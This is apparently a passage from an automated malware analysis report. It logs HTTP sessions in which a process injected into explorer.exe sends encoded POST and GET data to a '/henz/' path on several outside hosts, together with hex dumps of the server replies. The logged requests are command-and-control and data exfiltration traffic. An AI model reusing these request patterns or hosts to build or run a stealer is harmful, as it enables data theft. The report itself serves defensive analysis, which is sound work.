6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6c 65 66 74 3a 33 39 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 20 23 78 78 78 7b
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>404 - PAGE NOT FOUND</title>... Add Slide Outs --><script src="http://code.jquery.com/jquery-3.3.1.min.js"></script> <script src="/cgi-sys/js/simple-expand.min.js"></script> <style type="text/css"> body{padding:0;margin:0;font-family:helvetica;} #container{margin:20px auto;width:868px;} #container #top404{background-image:url('/cgi-sys/images/404top_w.jpg');background-repeat:no-repeat;width:868px;height:168px;} #container #mid404{background-image:url('/cgi-sys/images/404mid.gif');background-repeat:repeat-y;width:868px;} #container #mid404 #gatorbottom{position:relative;left:39px;float:left;} #container #mid404 #xxx{
                                                Nov 30, 2022 01:25:17.671319962 CET95INData Raw: 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 3a 34 30 70 78 20 33 39 37 70 78 20 31 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f 20 61 75 74 6f 20 2d 31 30 70 78 20 61 75 74 6f 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e
                                                Data Ascii: float:left;padding:40px 397px 10px; margin: auto auto -10px auto} #container #mid404 #content{float:left;text-align:center;width:868px;} #container #mid404 #content #errorcode{font-size:30px;font-weight:800;} #container
                                                Nov 30, 2022 01:25:17.671411037 CET96INData Raw: 34 20 23 63 6f 6e 74 65 6e 74 20 23 61 63 63 6f 72 64 69 6f 6e 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 35 25 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69
                                                Data Ascii: 4 #content #accordion p {font-size: 95%; text-align: left;} #container #mid404 #content #accordion h3 {font-weight: bold;} #container #mid404 #content #accordion h4 {font-weight: bold; font-style: italic; text-align: left;} .co
                                                Nov 30, 2022 01:25:17.671453953 CET97INData Raw: 63 61 75 73 65 20 79 6f 75 20 68 61 76 65 20 48 6f 74 20 4c 69 6e 6b 20 50 72 6f 74 65 63 74 69 6f 6e 20 74 75 72 6e 65 64 20 6f 6e 20 61 6e 64 20 74 68 65 20 64 6f 6d 61 69 6e 20 69 73 20 6e 6f 74 20 6f 6e 20 74 68 65 20 6c 69 73 74 20 6f 66 20
                                                Data Ascii: cause you have Hot Link Protection turned on and the domain is not on the list of authorized domains.</p><p>If you go to your temporary url (http://ip/~username/) and get this error, there maybe a problem with the rule set stored in
                                                Nov 30, 2022 01:25:17.671535969 CET99INData Raw: 6e 67 3e 20 69 73 20 69 6d 70 6f 72 74 61 6e 74 20 69 6e 20 74 68 69 73 20 65 78 61 6d 70 6c 65 2e 20 4f 6e 20 70 6c 61 74 66 6f 72 6d 73 20 74 68 61 74 20 65 6e 66 6f 72 63 65 20 63 61 73 65 2d 73 65 6e 73 69 74 69 76 69 74 79 20 3c 73 74 72 6f
                                                Data Ascii: ng> is important in this example. On platforms that enforce case-sensitivity <strong>e</strong>xample and <strong>E</strong>xample are not the same locations.</p><p>For addon domains, the file must be in public_html/addondomain.com/ex
                                                Nov 30, 2022 01:25:17.671602964 CET100INData Raw: 6f 6e 73 2e 3c 2f 70 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 3c 64 69 76 20 69 64 3d 22 77 70 22 3e 0a 09 09 09 09 09 09 3c 68 33 3e 3c 61 20 63 6c 61 73 73 3d 22 65 78 70 61 6e 64
                                                Data Ascii: ons.</p></div></div><div id="wp"><h3><a class="expander" href=#>404 Errors After Clicking WordPress Links</a></h3><div class="content"><p>When working with WordPress, 404 Page Not Found errors can
                                                Nov 30, 2022 01:25:17.671647072 CET101INData Raw: 69 74 20 79 6f 75 72 20 2e 68 74 61 63 63 65 73 73 20 66 69 6c 65 20 64 69 72 65 63 74 6c 79 2e 3c 2f 70 3e 0a 09 09 09 09 09 09 09 09 3c 68 34 3e 3c 75 3e 4f 70 74 69 6f 6e 20 32 3a 20 4d 6f 64 69 66 79 20 74 68 65 20 2e 68 74 61 63 63 65 73 73
                                                Data Ascii: it your .htaccess file directly.</p><h4><u>Option 2: Modify the .htaccess File</u></h4><p>Add the following snippet of code<em> </em>to the top of your .htaccess file:</p><div class="code"><p>#
                                                Nov 30, 2022 01:25:17.671710014 CET103INData Raw: 72 79 20 63 6f 6d 6d 6f 6e 20 64 69 72 65 63 74 69 76 65 73 20 66 6f 75 6e 64 20 69 6e 20 61 20 2e 68 74 61 63 63 65 73 73 20 66 69 6c 65 2c 20 61 6e 64 20 6d 61 6e 79 20 73 63 72 69 70 74 73 20 73 75 63 68 20 61 73 20 57 6f 72 64 50 72 65 73 73
                                                Data Ascii: ry common directives found in a .htaccess file, and many scripts such as WordPress, Drupal, Joomla and Magento add directives to the .htaccess so those scripts can function.</p><p>It is possible that you may need to edit the .htaccess
                                                Nov 30, 2022 01:25:17.671755075 CET104INData Raw: 6e 61 67 65 72 3c 2f 73 74 72 6f 6e 67 3e 20 69 63 6f 6e 2e 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 09 09 09 3c 6c 69 3e 43 68 65 63 6b 20 74 68 65 20 62 6f 78 20 66 6f 72 26 6e 62 73 70 3b 3c 73 74 72 6f 6e 67 3e 44 6f 63 75 6d 65 6e 74 20 52 6f 6f
                                                Data Ascii: nager</strong> icon.</li><li>Check the box for&nbsp;<strong>Document Root for</strong> and select the domain name you wish to access from the drop-down menu.</li><li>Make sure&nbsp;<strong>Show Hidden Files (dotfiles)</stro
                                                Nov 30, 2022 01:25:17.671791077 CET105INData Raw: 20 76 65 72 73 69 6f 6e 20 75 6e 74 69 6c 20 79 6f 75 72 20 73 69 74 65 20 77 6f 72 6b 73 20 61 67 61 69 6e 2e 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 09 09 09 3c 6c 69 3e 4f 6e 63 65 20 63 6f 6d 70 6c 65 74 65 2c 20 79 6f 75 20 63 61 6e 20 63 6c 69
                                                Data Ascii: version until your site works again.</li><li>Once complete, you can click&nbsp;<strong>Close</strong> to close the File Manager window.</li></ol></div></div></div></div> </div> <d


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.449696206.233.197.13580C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 30, 2022 01:25:23.108675003 CET106OUTPOST /henz/ HTTP/1.1
                                                Host: www.lyonfinancialusa.com
                                                Connection: close
                                                Content-Length: 185
                                                Cache-Control: no-cache
                                                Origin: http://www.lyonfinancialusa.com
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.lyonfinancialusa.com/henz/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Raw: 34 68 71 3d 46 5f 54 33 34 4d 43 59 37 4c 4c 6c 35 30 36 46 70 55 6d 45 4c 6d 56 30 6d 31 6d 41 7e 59 47 31 45 72 5a 72 7a 51 72 43 4f 57 4d 4c 57 30 50 39 66 6d 38 71 30 51 56 44 6d 5a 39 4b 58 4c 58 59 43 47 67 65 67 44 28 54 4b 77 71 30 79 6a 6f 58 48 68 65 62 75 32 37 65 5a 42 62 45 69 45 6b 62 33 42 53 6a 35 64 4f 6e 57 42 38 78 4b 44 71 48 63 52 32 4b 48 38 32 37 68 43 41 6c 51 79 65 4e 57 59 50 55 32 4c 59 59 6e 75 74 6f 58 35 49 43 7a 65 73 58 73 41 4b 7a 4d 4c 79 53 41 5f 6b 2d 4b 4d 30 4f 32 5f 38 30 57 4c 61 6b 52 4f 65 51 4c 77 29 2e 00 00 00 00 00 00 00 00
                                                Data Ascii: 4hq=F_T34MCY7LLl506FpUmELmV0m1mA~YG1ErZrzQrCOWMLW0P9fm8q0QVDmZ9KXLXYCGgegD(TKwq0yjoXHhebu27eZBbEiEkb3BSj5dOnWB8xKDqHcR2KH827hCAlQyeNWYPU2LYYnutoX5ICzesXsAKzMLySA_k-KM0O2_80WLakROeQLw).
                                                Nov 30, 2022 01:25:23.608623028 CET107INHTTP/1.1 301 Moved Permanently
                                                Server: nginx
                                                Date: Wed, 30 Nov 2022 00:25:23 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Powered-By: PHP/8.0.8
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Location: https://www.lyonfinancialusa.com/henz/
                                                Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                10192.168.2.449705192.185.35.8680C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 30, 2022 01:26:03.650060892 CET124OUTGET /henz/?4hq=dpH6BKfQQ0cm5Imeo72RAP4DEbjLNfLp0vSyI4bn1RZjePkdeS9augOMgWVykt+ztx1R3MJW/gsn5nuFARzMtUktTfqb4tJ3+A==&o8=wR-h28Gxg HTTP/1.1
                                                Host: www.lopezmodeling.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 30, 2022 01:26:03.794171095 CET126INHTTP/1.1 404 Not Found
                                                Date: Wed, 30 Nov 2022 00:26:03 GMT
                                                Server: Apache
                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                Cache-Control: no-store, no-cache, must-revalidate
                                                Pragma: no-cache
                                                Set-Cookie: PHPSESSID=642acd1bd4e5af4738220f65563c7d37; path=/; HttpOnly
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 61 30 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 73 20 2d 2d 3e 0a 0a 0a 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 46 6f 6e 74 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 7c 52 61 6c 65 77 61 79 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 35 30 30 2c 35 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 7c 50 6f 70 70 69 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 35 30 30 2c 35 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 56 65 6e 64 6f 72 20 43 53 53 20 46 69 6c 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 76 32 5f 76 65 6e 64 6f 72 2f 61 6f 73 2f 61 6f 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 76 32 5f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 76 32 5f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a
                                                Data Ascii: a05<!DOCTYPE html><html lang="en-us"> <head> <meta charset="utf-8"> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <title></title> <meta name="robots" content="noindex, nofollow"> <meta content="" name="description"> <meta content="" name="keywords"> ... Favicons --> ... Google Fonts --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i|Raleway:300,300i,400,400i,500,500i,600,600i,700,700i|Poppins:300,300i,400,400i,500,500i,600,600i,700,700i" rel="stylesheet"> ... Vendor CSS Files --> <link href="/v2_vendor/aos/aos.css" rel="stylesheet"> <link href="/v2_vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet"> <link href="/v2_vendor/bootstrap-icons/bootstrap-icons.css" rel="stylesheet">
                                                Nov 30, 2022 01:26:03.794229984 CET127INData Raw: 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 76 32 5f 76 65 6e 64 6f 72 2f 62 6f 78 69 63 6f 6e 73 2f 63 73 73 2f 62 6f 78 69 63 6f 6e 73 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20
                                                Data Ascii: <link href="/v2_vendor/boxicons/css/boxicons.min.css" rel="stylesheet"> <link href="/v2_vendor/glightbox/css/glightbox.min.css" rel="stylesheet"> <link href="/v2_vendor/remixicon/remixicon.css" rel="stylesheet">
                                                Nov 30, 2022 01:26:03.794259071 CET128INData Raw: 6f 74 73 74 72 61 70 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 76 32 5f 76 65 6e 64 6f 72 2f 67 6c 69 67 68 74 62 6f 78 2f 6a 73
                                                Data Ascii: otstrap/js/bootstrap.bundle.min.js"></script><script src="/v2_vendor/glightbox/js/glightbox.min.js"></script><script src="/v2_vendor/isotope-layout/isotope.pkgd.min.js"></script><script src="/v2_vendor/swiper/swiper-bundle.min.js"></script>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                11192.168.2.449706154.22.100.6280C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 30, 2022 01:26:09.202491999 CET129OUTPOST /henz/ HTTP/1.1
                                                Host: www.foxwhistle.com
                                                Connection: close
                                                Content-Length: 185
                                                Cache-Control: no-cache
                                                Origin: http://www.foxwhistle.com
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.foxwhistle.com/henz/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Raw: 34 68 71 3d 75 4b 4a 33 71 67 6f 51 6a 53 53 49 6c 37 32 53 57 52 62 78 6d 4a 66 79 62 2d 43 48 5a 61 64 44 71 46 6a 78 48 58 77 39 33 69 43 66 6a 62 65 45 52 54 39 32 4c 59 53 45 33 41 4d 38 63 33 61 5a 67 38 43 4b 6d 47 6a 6a 44 46 31 39 43 71 33 69 35 31 36 62 34 4c 61 63 41 5a 4c 31 77 7a 45 78 77 70 79 56 48 52 6b 62 4f 53 7e 71 41 33 58 61 4a 37 6b 37 62 74 6d 45 4b 38 6e 45 35 33 74 6f 56 37 6c 56 72 36 50 49 42 54 57 77 58 39 76 46 62 47 67 4c 7e 48 70 47 45 74 4f 2d 73 72 33 35 7e 37 51 67 4b 64 72 48 41 74 48 34 6c 47 7e 42 57 67 29 2e 00 00 00 00 00 00 00 00
                                                Data Ascii: 4hq=uKJ3qgoQjSSIl72SWRbxmJfyb-CHZadDqFjxHXw93iCfjbeERT92LYSE3AM8c3aZg8CKmGjjDF19Cq3i516b4LacAZL1wzExwpyVHRkbOS~qA3XaJ7k7btmEK8nE53toV7lVr6PIBTWwX9vFbGgL~HpGEtO-sr35~7QgKdrHAtH4lG~BWg).
                                                Nov 30, 2022 01:26:09.375113010 CET130INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Wed, 30 Nov 2022 00:23:55 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Content-Encoding: gzip
                                                Data Raw: 33 63 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 54 5b 6b 1b 47 14 7e 17 e8 3f 4c d6 18 64 f0 5e 25 af ad d5 a5 c4 b2 4d 02 89 13 1a f5 46 08 61 b4 3b d2 4e b3 17 75 67 24 59 55 0c 89 9b 10 b7 d4 24 0f 6e 8a 93 42 2f f4 62 28 d4 a1 b4 e9 35 f9 33 8d d6 ca 53 ff 42 cf ac 56 b2 72 79 e8 0a 34 17 be f3 9d 73 be 39 e7 94 4f ad 5d a8 d5 df bb b8 8e 5c ee 7b e8 e2 5b ab e7 ce d6 90 24 ab ea 3b f9 9a aa ae d5 d7 d0 bb 67 ea e7 cf 21 5d d1 d0 25 1e 51 9b ab ea fa a6 84 24 97 f3 b6 a5 aa bd 5e 4f e9 e5 95 30 6a a9 f5 37 d5 2d c1 a2 0b b3 74 2b b3 c4 46 71 b8 23 55 b3 99 72 e2 65 cb f7 02 56 79 0d 83 5e 2c 16 c7 86 63 30 c1 8e 30 f2 09 c7 10 1f 6f cb e4 83 0e ed 56 a4 5a 18 70 12 70 b9 de 6f 13 09 d9 e3 53 45 e2 64 8b ab c2 43 09 d9 2e 8e 18 e1 95 56 c3 c8 eb 86 a4 0a 1a 4e b9 47 aa 05 ad 80 64 14 7f fc f4 d9 ef 7b c3 dd 47 f1 fd 3b cf fe 7a 1c ef de 3f 7e f8 d3 f0 c9 67 ff dc d8 29 ab 63 60 36 03 36 8c f7 3d 82 38 f8 49 e9 6d c6 92 d8 4e c9 72 36 d3 08 9d fe c0 c7 51 8b 06 96 56 6a 42 1c 32 a3 1f 12 4b 59 26 fe f8 d8 c4 3e f5 fa d6 db 24 72 70 80 17 d1 e9 88 62 6f 11 9d 21 5e 97 70 6a c3 0d c3 01 93 19 89 68 b3 d4 c0 f6 b5 56 14 76 02 c7 9a 5b 4f be d2 76 36 d3 a4 c4 73 20 97 41 1b 3b 0e 0d 5a 96 86 f4 a5 f6 16 d2 35 f1 07 bb d2 36 ca 66 5c 7d 70 e2 df 50 0a 10 c0 34 30 3b f4 c2 c8 9a db d8 d8 10 7c ae 31 83 d4 93 50 5f 46 d6 6a 1a 7c 63 de fc 0b 68 e3 04 9d f8 d7 c4 af 94 3a 10 46 a9 d9 9c 0b 6f 47 a2 41 8f 3a dc b5 8a e6 fc d4 47 6a 32 49 c6 04 12 63 1e 8d 97 17 34 93 78 44 1a 1d db 25 1c 9d bf 24 2d a2 a9 86 33 8a cd 64 06 af 31 95 4f 4e ef 97 92 4f 24 3d 97 16 c9 f4 b5 92 30 8c f9 52 3b 64 94 d3 30 b0 22 e2 61 4e bb 44 a0 95 14 0d 3c 01 c7 34 80 44 66 df 46 08 f9 72 62 32 0f db d6 0a 3c c6 24 31 21 cf eb d9 65 59 14 90 9a 94 56 b2 13 5a 89 8d 28 27 b1 3a b4 8b a8 03 0d 92 68 28 55 cb ae 5e 8d bf d8 1b 7e f2 f5 f0 e0 f0 f9 fe c1 e8 e8 08 8c f4 6a 59 05 e4 ac 41 1a b6 28 50 94 b0 d8 1e 66 d0 69 af a4 03 9c 93 b2 02 ac a8 73 3b a2 6d 0e fb 2e 8e d0 55 d7 e7 a8 32 5e ae 5f 47 97 af 94 b2 99 5c b3 13 d8 42 a8 dc 02 1a 00 3d 12 40 d7 07 98 13 da 1d 1f ba 51 b1 23 82 39 59 f7 88 38 e5 a4 31 a5 b4 00 c6 08 90 0a 8b 6c 40 27 5d cf 60 70 c0 4d 03 53 a7 03 5a fb e2 f0 3e 7b c3 d1 96 4d b3 a0 e7 6d d3 34 49 be 58 68 ae 98 ba be b2 a4 ad 98 ce 72 73 c9 68 4a 09 95 70 cc 66 fd b6 08 4f 9d b2 d5 7e 1d b7 36 b1 4f 4e dc 5f d6 ae 94 a0 3f 10 62 4a 1b 47 10 d9 66 e8 10 85 06 d0 72 7c 95 34 c3 88 e4 5c 1f da 50 c4 b9 bd 90 13 0b bc cd 44 8e a9 34 08 c2 9f 8e 2c 43 33 15 5d 2f 2a ba a6 2b 7a 7e 59 c5 d7 ae 9e 76 9c 88 30 a6 a6 2b a4 03 1a 9f f0 20 54 76 8d ff 33 7b 00 25 82 2d bb f9 6a bc 73 38 fa fe 66 fc e5 77 30 ac 8e 1f dc 1a fd 7a 2b fe f3 de f0 ee d1 e8 a3 27 c3 df 7e 1e 7d f3 e3 70 f7 ab e7 07 df fe fb f7 a7 70 8c 1f fe 12 ef ff 31 bc b7 77 fc c3 23 98 66 a3 1b b7 e3 07 3b f1 e7 8f c5 94 bb 7b 74 bc 7f 98 4c 36 60 15 a5 a1 4e 1f 7f 5a 42 93 52 52 27 45 98 0c d2 ea 7f ef 14 5d 1c 20 06 00 00 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 3caT[kG~?Ld^%MFa;Nug$YU$nB/b(53SBVry4s9O]\{[$;g!]%Q$^O0j7-t+Fq#UreVy^,c00oVZppoSEdC.VNGd{G;z?~g)c`66=8ImNr6QVjB2KY&>$rpbo!^pjhVv[Ov6s A;Z56f\}pP40;|1P_Fj|ch:FoGA:Gj2Ic4xD%$-3d1ONO$=0R;d0"aND<4DfFrb2<$1!eYVZ(':h(U^~jYA(Pfis;m.U2^_G\B=@Q#9Y81l@']`pMSZ>{Mm4IXhrshJpfO~6ON_?bJGfr|4\PD4,C3]/*+z~Yv0+ Tv3{%-js8fw0z+'~}pp1w#f;{tL6`NZBRR'E] 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                12192.168.2.449707154.22.100.6280C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 30, 2022 01:26:11.437297106 CET131OUTGET /henz/?4hq=jIhXpQA4pSG2yYWBb37zpp/PG+nmQ9F5uiLrR0YNz1ez7r/FQUV2GqKIrgsyQUbvld7C5UuQUlYsY6nmozac85OtAKDr0AUC2A==&o8=wR-h28Gxg HTTP/1.1
                                                Host: www.foxwhistle.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 30, 2022 01:26:11.609244108 CET132INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Wed, 30 Nov 2022 00:23:57 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Data Raw: 36 32 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 e6 89 be e4 b8 8d e5 88 b0 e6 96 87 e4 bb b6 e6 88 96 e7 9b ae e5 bd 95 e3 80 82 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 